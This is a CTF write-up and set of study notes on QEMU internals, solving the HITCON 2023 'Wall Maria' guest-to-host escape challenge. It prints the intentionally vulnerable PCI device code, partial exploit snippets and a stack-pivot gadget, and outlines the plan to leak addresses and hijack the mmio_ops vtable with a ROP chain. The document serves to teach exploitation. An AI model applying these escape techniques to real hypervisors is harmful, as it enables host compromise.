# QEMU learning ## What is QEMU? QEMU (a.k.a Quick Emulator) is an open-source emulator to interoperate with KVMs (Kernel-based Virtual Machines) and also used when to want run applications compiled in one architecture (e.g: arm) on another architecture (e.g: x86_64) ## Setup QEMU Download ```bash wget https://download.qemu.org/qemu-8.0.2.tar.xz ``` Install dependencies ```bash sudo pip3 install ninja sudo apt install libglib2.0-dev libgcrypt20-dev zlib1g-dev autoconf automake libtool bison flex libpixman-1-dev ``` Build ```shell cd qemu-8.0.2 ./configure --enable-debug && cd build && make -j`nproc` ``` ## PCI devices Learn to custom a PCI device https://www.youtube.com/watch?v=MTUuymrutNw ```sh ./qemu-system-x86_64 -device help | grep "PCI" ─╯ name "cxl-downstream", bus PCI, desc "CXL Switch Downstream Port" name "cxl-rp", bus PCI, desc "CXL Root Port" name "cxl-upstream", bus PCI, desc "CXL Switch Upstream Port" name "i82801b11-bridge", bus PCI name "ioh3420", bus PCI, desc "Intel IOH device id 3420 PCIE Root Port" name "pci-bridge", bus PCI, desc "Standard PCI Bridge" name "pci-bridge-seat", bus PCI, desc "Standard PCI Bridge (multiseat)" name "pcie-pci-bridge", bus PCI name "pcie-root-port", bus PCI, desc "PCI Express Root Port" name "pxb", bus PCI, desc "PCI Expander Bridge" name "pxb-cxl", bus PCI, desc "CXL Host Bridge" name "pxb-pcie", bus PCI, desc "PCI Express Expander Bridge" name "vfio-pci-igd-lpc-bridge", bus PCI, desc "VFIO dummy ISA/LPC bridge for IGD assignment" name "x3130-upstream", bus PCI, desc "TI X3130 Upstream Port of PCI Express Switch" name "xio3130-downstream", bus PCI, desc "TI X3130 Downstream Port of PCI Express Switch" name "ich9-usb-ehci1", bus PCI name "ich9-usb-ehci2", bus PCI name "ich9-usb-uhci1", bus PCI name "ich9-usb-uhci2", bus PCI name "ich9-usb-uhci3", bus PCI name "ich9-usb-uhci4", bus PCI name "ich9-usb-uhci5", bus PCI name "ich9-usb-uhci6", bus PCI name "nec-usb-xhci", bus PCI name "pci-ohci", bus PCI, desc "Apple USB Controller" name "piix3-usb-uhci", bus PCI name "piix4-usb-uhci", bus PCI name "qemu-xhci", bus PCI name "usb-ehci", bus PCI name "am53c974", bus PCI, desc "AMD Am53c974 PCscsi-PCI SCSI adapter" name "cxl-type3", bus PCI, desc "CXL PMEM Device (Type 3)" name "dc390", bus PCI, desc "Tekram DC-390 SCSI adapter" name "ich9-ahci", bus PCI, alias "ahci" name "lsi53c810", bus PCI name "lsi53c895a", bus PCI, alias "lsi" name "megasas", bus PCI, desc "LSI MegaRAID SAS 1078" name "megasas-gen2", bus PCI, desc "LSI MegaRAID SAS 2108" name "mptsas1068", bus PCI, desc "LSI SAS 1068" name "nvme", bus PCI, desc "Non-Volatile Memory Express" name "piix3-ide", bus PCI name "piix4-ide", bus PCI name "pvscsi", bus PCI name "sdhci-pci", bus PCI name "vhost-scsi-pci", bus PCI name "vhost-scsi-pci-non-transitional", bus PCI name "vhost-scsi-pci-transitional", bus PCI name "vhost-user-blk-pci", bus PCI name "vhost-user-blk-pci-non-transitional", bus PCI name "vhost-user-blk-pci-transitional", bus PCI name "vhost-user-fs-pci", bus PCI name "vhost-user-scsi-pci", bus PCI name "vhost-user-scsi-pci-non-transitional", bus PCI name "vhost-user-scsi-pci-transitional", bus PCI ``` Check device in a given qemu, we can see lots of PCI devices. If you need additional information, check [PCI](https://en.wikipedia.org/wiki/Conventional_PCI) Basically, PCI devices are local buses that attach hardware devices, equip new features for hypervisor. We can interact with PCI devices using 2 methods: - MMIO (Memory-mapped I/O) - PMIO (Port-mapped I/O) With MMIO, we can use assembly intructions like `mov` to communicate with host, and `in/out` if it is `PMIO`. In my blog we will mainly use `MMIO` as a means of communication. ```sh 00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01) 00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01) 00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 08) 00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 08) 00:07.7 System peripheral: VMware Virtual Machine Communication Interface (rev 10) 00:0f.0 VGA compatible controller: VMware SVGA II Adapter 00:10.0 SCSI storage controller: Broadcom / LSI 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01) 00:11.0 PCI bridge: VMware PCI bridge (rev 02) 00:15.0 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.1 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.2 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.3 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.4 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.5 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.6 PCI bridge: VMware PCI Express Root Port (rev 01) 00:15.7 PCI bridge: VMware PCI Express Root Port (rev 01) 00:16.0 PCI bridge: VMware PCI Express Root Port (rev 01) ``` In many hypervisors escape such as `QEMU`, `VMWare`, `Virtualbox`, we will principally take advantage of those PCI devices to achieve guest-to-host escape. ## Memory API https://www.qemu.org/docs/master/devel/memory.html The `qemu` memory mapped region will be initializied using the [memory_region_init_io](https://elixir.bootlin.com/qemu/v8.0.2/source/softmmu/memory.c#L1530) `hwaddr` is a special data type, which is types of address in this space, being decomposed into pages. https://android.googlesource.com/platform/external/qemu.git/+/master/docs/QEMU-MEMORY-MANAGEMENT.TXT It would allow qemu to perform I/O operations from guest to host and vice versa ## HITCON 2023 - Wall Maria Check the initialization of qemu, some considerable things: I modify `run.sh` a little to run it on local: ```bash #!/bin/bash ./qemu-system-x86_64 \ -L ./bios \ -kernel ./bzImage \ -initrd ./initramfs.cpio.gz \ -cpu kvm64,+smep,+smap \ -monitor none \ -m 1024M \ -monitor /dev/null \ -append "console=ttyS0 oops=panic panic=1 quiet nokpti nokaslr" \ -nographic \ -no-reboot \ -net user -net nic -device e1000 \ -device maria \ -enable-kvm \ -s ``` I you should get familiar with debugging kernel stuffs first, because this could serve as a fundamental background to understand virtualization stuffs. Check [this blog](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) so that Alike Linux kernel exploit, we will be given a bash script to run a kernel emulated by `qemu`. Again some options that you should pay attention to - `-L bios` specifies the directory for `BIOS`, `VGA-bios` and `keymaps` - `-initrd initramfs.cpio.gz` to specify the compressed file system including root directory. - `-enable-kvm` to accelerate `QEMU` by allowing usage of `kvm` from the host. - `-device maria` specifies the device enabled for running `QEMU`. - `-s` to make gdb attach to port 1234, if we want to debug from kernel More information about kvm If you want to enable kvm on VMWare, do as the following picture ![image](https://hackmd.io/_uploads/SyB7avUgR.png) Then, disable Hyper-V by running `bcdedit /set hypervisorlaunchtype off`, in powershell with admin privilege, then reboot. If you use WSL, you can enable `nested virtualization`, check [this site](https://serverfault.com/questions/1043441/how-to-run-kvm-nested-in-wsl2-or-vmware) If successful, `/dev/kvm` will exist and you can use the command `kvm-ok` to check the status of kvm. ![image](https://hackmd.io/_uploads/H1qBudLe0.png) **Source code** ```c #include "hw/hw.h" #include "hw/pci/msi.h" #include "hw/pci/pci.h" #include "qapi/visitor.h" #include "qemu/main-loop.h" #include "qemu/module.h" #include "qemu/osdep.h" #include "qom/object.h" #define TYPE_PCI_MARIA_DEVICE "maria" #define MARIA_MMIO_SIZE 0x10000 #define BUFF_SIZE 0x2000 typedef struct { PCIDevice pdev; struct { uint64_t src; uint8_t off; } state; char buff[BUFF_SIZE]; MemoryRegion mmio; } MariaState; DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE) static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) { MariaState *maria = (MariaState *)opaque; uint64_t val = 0; switch (addr) { case 0x00: cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1); val = 0x600DC0DE; break; case 0x04: val = maria->state.src; break; case 0x08: val = maria->state.off; break; default: val = 0xDEADC0DE; break; } return val; } static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) { MariaState *maria = (MariaState *)opaque; switch (addr) { case 0x00: cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0); break; case 0x04: maria->state.src = val; break; case 0x08: maria->state.off = val; break; default: break; } } static const MemoryRegionOps maria_mmio_ops = { .read = maria_mmio_read, .write = maria_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .min_access_size = 4, .max_access_size = 4, }, .impl = { .min_access_size = 4, .max_access_size = 4, }, }; static void pci_maria_realize(PCIDevice *pdev, Error **errp) { MariaState *maria = MARIA(pdev); memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE); pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio); } static void maria_instance_init(Object *obj) { MariaState *maria = MARIA(obj); memset(&maria->state, 0, sizeof(maria->state)); memset(maria->buff, 0, sizeof(maria->buff)); } static void maria_class_init(ObjectClass *class, void *data) { DeviceClass *dc = DEVICE_CLASS(class); PCIDeviceClass *k = PCI_DEVICE_CLASS(class); k->realize = pci_maria_realize; k->vendor_id = PCI_VENDOR_ID_QEMU; k->device_id = 0xDEAD; k->revision = 0x0; k->class_id = PCI_CLASS_OTHERS; set_bit(DEVICE_CATEGORY_MISC, dc->categories); } static void pci_maria_register_types(void) { static InterfaceInfo interfaces[] = { { INTERFACE_CONVENTIONAL_PCI_DEVICE }, { }, }; static const TypeInfo maria_info = { .name = TYPE_PCI_MARIA_DEVICE, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof(MariaState), .instance_init = maria_instance_init, .class_init = maria_class_init, .interfaces = interfaces, }; type_register_static(&maria_info); } type_init(pci_maria_register_types) ``` For a qemu escape challenges, or in some CVEs related to `Virtualbox` and `VMWare`, our target is to exploit the vulnerable device compiled when building `QEMU`. There could be VGA devices, network cards, disk controllers, so on A custom device called `maria` is implemented, so let's dig deeper and figure out the bug. ![image](https://hackmd.io/_uploads/BJ1niyweA.png) You can check the device `maria` by using `lspci` in the given kernel. ![image](https://hackmd.io/_uploads/BJPQP0Le0.png) So where is the `device maria`? Check those lines, then read the source code of `QEMU` ```c k->vendor_id = PCI_VENDOR_ID_QEMU; k->device_id = 0xDEAD; ``` That means the last line in the output is the `maria` device. ![image](https://hackmd.io/_uploads/S1iUVyDlC.png) Here in the directory `/sys/devices/pci0000:00/0000:00:05.0`, information about the `maria` device is stored here. ![image](https://hackmd.io/_uploads/S1RT41veC.png) So to interact with the devices, we will focus on some files with format `resourceX`, with X can be >= 0. ![image](https://hackmd.io/_uploads/BJ4sBkPeC.png) If we try to `cat` or `echo`, it would fail. Instead of using traditional I/O, we can use `mmap` for these `sysfs` resources. ```c uint32_t mmio_read(uint32_t addr) { return *(uint32_t *)(mmio_mem + addr); } int main(){ int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC); if (fd < 0){ errExit("Open /sys/devices/pci0000:00/0000:00:05.0/resource0 failed"); } mmio_mem = mmap(NULL, PAGE_SIZE * 4, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); if (mmio_mem == MAP_FAILED){ errExit("mmio"); } mmio_read(0); } ``` Why we need `O_SYNC` flag in `open`? As changes memory mapped region can immediately change the content of file, this flag allows us to send `"signals"` to underlying hardware and flush the file, guaranteed uncached data in memory mapped region. https://stackoverflow.com/questions/72115837/when-does-o-sync-have-an-effect ### BUG ```c static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) { MariaState *maria = (MariaState *)opaque; uint64_t val = 0; switch (addr) { case 0x00: cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1); val = 0x600DC0DE; break; case 0x04: val = maria->state.src; break; case 0x08: val = maria->state.off; break; default: val = 0xDEADC0DE; break; } return val; } static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) { MariaState *maria = (MariaState *)opaque; switch (addr) { case 0x00: cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0); break; case 0x04: maria->state.src = val; break; case 0x08: maria->state.off = val; break; default: break; } } ``` ```c typedef struct { PCIDevice pdev; struct { uint64_t src; uint8_t off; } state; char buff[BUFF_SIZE]; MemoryRegion mmio; } MariaState; ``` `cpu_physical_memory_rw` is a special function, whose function is similar to `memcpy`, but whether `rdi` or `rsi` is src or dest depends on the 4th param. Its two first params are physical address, not virtual address. To know more about physical address and virtual address, you can see [GVA and GPA](https://www.geeksforgeeks.org/memory-allocation-techniques-mapping-virtual-addresses-to-physical-addresses/) Indeed, we cannot use virtual address anymore to interact, but through `hardware address` or `hwaddr`. The 3rd param, which is `BUFF_SIZE`, is fixed and equals to the size of `buff`. Trying to increase `maria.off` will lead to `oob read/write` in both `read` and `write` function. **Notes: We are trying to exploit a single program, so being accustomed to pwning userland binary is definitely a prerequisite, as we will use C to exploit the device, which must be harder compared to python.** ### OOB Read/Write First, I need to hit the breakpoint in `maria_mmio_read` and `maria_mmio_write`. ```c mmio_write(0x0, 0x0); ``` ![image](https://hackmd.io/_uploads/HJubnkwxC.png) Breakpoint hit! Let's check what we can leverage ```sh pwndbg> ptype /o maria type = struct { /* 0 | 2592 */ PCIDevice pdev; /* 2592 | 16 */ struct { /* 2592 | 8 */ uint64_t src; /* 2600 | 1 */ uint8_t off; /* XXX 7-byte padding */ /* total size (bytes): 16 */ } state; /* 2608 | 8192 */ char buff[8192]; /* 10800 | 272 */ MemoryRegion mmio; /* total size (bytes): 11072 */ } * ``` #### OOB Read It will copy from `buff[8192]` until enough `0x2000` bytes, and after `buff` there is `MemoryRegion mmio` [MemoryRegion definition](https://elixir.bootlin.com/qemu/v8.0.2/source/include/exec/memory.h#L753) ![image](https://hackmd.io/_uploads/ByE3nkPeA.png) ![image](https://hackmd.io/_uploads/BJfza1wg0.png) Address highlighted in blue is `heap`, containing the struct `Maria`, while the one highlighted in red and write are qemu base address. Leaking qemu base address is ez, so let's find out how to write. #### OOB Write ```c static const MemoryRegionOps maria_mmio_ops = { .read = maria_mmio_read, .write = maria_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .min_access_size = 4, .max_access_size = 4, }, .impl = { .min_access_size = 4, .max_access_size = 4, }, }; ``` ![image](https://hackmd.io/_uploads/HJxkRkvxR.png) As `sandbox` is enabled, `fork` and `execve` are all blacklisted, `maria_mmio_ops` works like a vtable function pointers. As such, if we try to interact through memory mapped region, it will base on this function pointer. So instead of calling those functions, replace it with our `stack pivot` gadget. Also, because of `opaque` stored in `rax` where it jumps into the entry function, this gadget would be the most perfect ``` 0x00000000007bce54 : push rax ; pop rsp ; nop ; pop rbp ; ret ``` From here, we can build a `orw` payload, or `ROP` to `mprotect` and jump to our shellcode. ### Exploit First set offset to 0xf0, then read some stuffs behind buff ```c void set_off(uint32_t value) { mmio_write(0x08, value); } set_off(0xf0); ``` Then, set `src` to a physical address whose virtual address is called by mmap to `read` and `write` into. To find physical address of an arbitrary virtual address, open pagemap and lseek to see the address https://www.kernel.org/doc/Documentation/vm/pagemap.txt http://www.phrack.org/issues/70/5.html ### Another problem? `char buff[0x200]` is larger than a page size, which is only 0x1000. So problem occurs here If we try to mmap a region with a size `0x2000`, when converted to a physical memory, will be mapped into different pages. This will make our read buffers wrong, as it is not the consecutive pages. **How to deal with this?** ``` /root # cat /proc/meminfo MemTotal: 992864 kB MemFree: 897008 kB MemAvailable: 892184 kB Buffers: 0 kB Cached: 72104 kB SwapCached: 0 kB Active: 11372 kB Inactive: 61200 kB Active(anon): 11372 kB Inactive(anon): 61200 kB Active(file): 0 kB Inactive(file): 0 kB Unevictable: 0 kB Mlocked: 0 kB SwapTotal: 0 kB SwapFree: 0 kB Dirty: 0 kB Writeback: 0 kB AnonPages: 492 kB Mapped: 1908 kB Shmem: 72104 kB KReclaimable: 9328 kB Slab: 15576 kB SReclaimable: 9328 kB SUnreclaim: 6248 kB KernelStack: 732 kB PageTables: 156 kB SecPageTables: 0 kB NFS_Unstable: 0 kB Bounce: 0 kB WritebackTmp: 0 kB CommitLimit: 496432 kB Committed_AS: 73608 kB VmallocTotal: 34359738367 kB VmallocUsed: 980 kB VmallocChunk: 0 kB Percpu: 228 kB HugePages_Total: 0 HugePages_Free: 0 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 2048 kB Hugetlb: 0 kB DirectMap4k: 20352 kB DirectMap2M: 1028096 kB /root # ``` We have two ways - Allocating multiple pages, then try to find the physical address of each page to see if any of them are linear. - Set hugepages To allow system to manage large blocks of memory, `hugepage` can be modified. https://infohub.delltechnologies.com/en-US/l/day-two-best-practices-10/red-hat-enterprise-linux-hugepages-2/ ```bash sysctl -w vm.nr_hugepages=40 ``` To modify number of hugepages in the system. After leaking, overwrite `mmio_ops` and `opaque` with our crafted vtable pointers and our ROP chain, respectively. **Before** ![image](https://hackmd.io/_uploads/rkYtSxDeA.png) **After** ![image](https://hackmd.io/_uploads/SkHTrxPeA.png) ![image](https://hackmd.io/_uploads/HyA0Bevg0.png) ![image](https://hackmd.io/_uploads/H1sgUgPx0.png) ### Summary A baby qemu escape challenge to get interested in a great amount of shitty code. Learn a lot about how to interact with PCI devices and exploit it, hopefully to grasp more about networking and VGA card. ## Reference https://elixir.bootlin.com/qemu/v8.0.2/source https://airbus-seclab.github.io/qemu_blog/pci.html https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio https://www.qemu.org/docs/master/devel/memory.html https://burgers.io/pci-access-without-a-driver https://kb.vmware.com/s/article/2057914 https://www.kernel.org/doc/Documentation/vm/pagemap.txt http://www.phrack.org/issues/70/5.html